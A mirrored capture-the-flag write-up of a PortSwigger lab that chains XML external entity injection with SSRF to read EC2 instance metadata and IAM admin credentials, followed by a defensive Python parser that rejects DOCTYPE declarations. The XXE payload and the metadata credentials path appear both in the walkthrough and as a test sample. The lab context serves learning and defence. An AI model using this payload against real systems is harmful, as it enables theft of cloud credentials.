mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2025-02-16 20:18:24 +00:00
Portswigger XXE-Lab 2
Exploiting XXE to perform SSRF attacks
In this lab we are told to perform XXE and chain it with SSRF to access the EC2 instance's metadata and retrieve the IAM admin credentials. The check stock feature is vulnerable to XXE because it parses data in XML format.
![](https://i.imgur.com/bq4tglm.png)
![](https://i.imgur.com/ULFHsIF.png)
So let's use Burp Suite to capture the request
![](https://i.imgur.com/iYWTtja.png)
To perform an XXE attack, we need to declare an external entity
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY arz SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
  <productId>14</productId>
  <storeId>1</storeId>
</stockCheck>
```
![](https://i.imgur.com/naEFY0j.png)
This is expecting `latest`, so let's add that
![](https://i.imgur.com/R05obzK.png)
Now it expects `meta-data`, so in this way we can find the endpoints
![](https://i.imgur.com/te36Pld.png)
And eventually we'll find the IAM credentials at

http://169.254.169.254/latest/meta-data/iam/security-credentials/admin
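
On the defending side, the stock check only needs two numeric fields, so the parser can refuse any DOCTYPE before an entity is ever resolved. The following is an added example, not code from this writeup or from the lab; `parse_stock_check` and `ForbiddenXML` are hypothetical names, and the sample bodies are constructed from the request shown above.

```python
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD or entity declaration."""


def parse_stock_check(body: bytes) -> dict:
    """Parse a <stockCheck> body, refusing DOCTYPE so no entity is resolved."""
    parser = expat.ParserCreate()
    fields, stack, text = {}, [], []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML("DOCTYPE is not allowed in stockCheck requests")

    def reject_entity(*args):
        raise ForbiddenXML("entity declarations are not allowed")

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        # Record only direct children of <stockCheck>.
        if len(stack) == 2 and stack[0] == "stockCheck":
            fields[name] = "".join(text).strip()
        stack.pop()
        text.clear()

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)  # exceptions raised in handlers propagate here

    # Both fields are numeric in the request above; int() rejects anything else.
    return {k: int(fields[k]) for k in ("productId", "storeId")}


# Constructed sample bodies: the request from this page, with and without the DTD.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>14</productId><storeId>1</storeId></stockCheck>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE test [<!ENTITY arz SYSTEM "http://169.254.169.254/"> ]>'
            b'<stockCheck><productId>14</productId><storeId>1</storeId></stockCheck>')
```
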